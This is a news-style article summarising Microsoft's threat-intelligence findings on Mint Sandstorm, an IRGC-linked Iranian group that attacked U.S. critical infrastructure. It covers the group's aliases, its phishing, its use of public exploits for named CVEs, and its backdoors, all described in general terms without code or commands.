According to an analysis by the Microsoft Threat Intelligence team, between late 2021 and mid-2022, an attack linked to a government-backed Iranian actor known as Mint Sandstorm targeted critical infrastructure in the U.S. The Mint Sandstorm subgroup is highly capable and has shown agility in its operational focus, which appears to align with Iran’s national priorities.
The targets of the attacks include seaports, energy companies, transit systems, and a major U.S. utility and gas company. Speculations showed the activity could be retaliatory in response to attacks targeting Iran’s maritime, railway, and gas station payment systems between May 2020 and late 2021. It is important to note that Iran subsequently accused Israel and the U.S. of masterminding the attacks on the gas stations attempting to destabilize the country.
Microsoft was previously tracking the threat actor under the name Phosphorus. Before Mint Sandstorm became the new name, the threat actor was also known as APT35, Charming Kitten, ITG18, TA453, and Yellow Garuda. Microsoft’s shift from chemical elements-inspired monikers to a new weather-themed threat actor naming taxonomy led to the change in nomenclature driven by the increasing “complexity, scale, and volume of threats.”
Unlike MuddyWater, known to operate on behalf of Iran’s Ministry of Intelligence and Security (MOIS), Mint Sandstorm is associated with the Islamic Revolutionary Guard Corps (IRGC). The attacks conducted by Mint Sandstorm demonstrate the adversary’s ability to constantly refine its tactics through highly targeted phishing campaigns to access targeted environments.
It includes rapidly adopting publicly disclosed proofs-of-concept (PoCs) linked to vulnerabilities in internet-facing applications, such as CVE-2022-47966 and CVE-2022-47986, into their playbooks for initial access and persistence. A custom PowerShell script is deployed upon a successful intrusion, triggering one of two attack chains. The first chain utilizes additional PowerShell scripts to establish a connection with remote servers and exfiltrate Active Directory databases.
The other sequence utilizes Impacket to connect to an actor-controlled server and deploy Drokbk and Soldier. The latter is a multistage .NET backdoor with the ability to download and run tools and self-uninstall.
In addition, Microsoft identified Mint Sandstorm for carrying out phishing campaigns with low volume, utilizing a custom and modular backdoor named CharmPower. This malware, based on PowerShell, can gather host information, read files, and extract data. The intrusion capabilities of the Mint Sandstorm subgroup are concerning as it allows operators to hide their command-and-control communication, sustain their presence in a compromised system, and employ various post-compromise tools with unique functionalities.
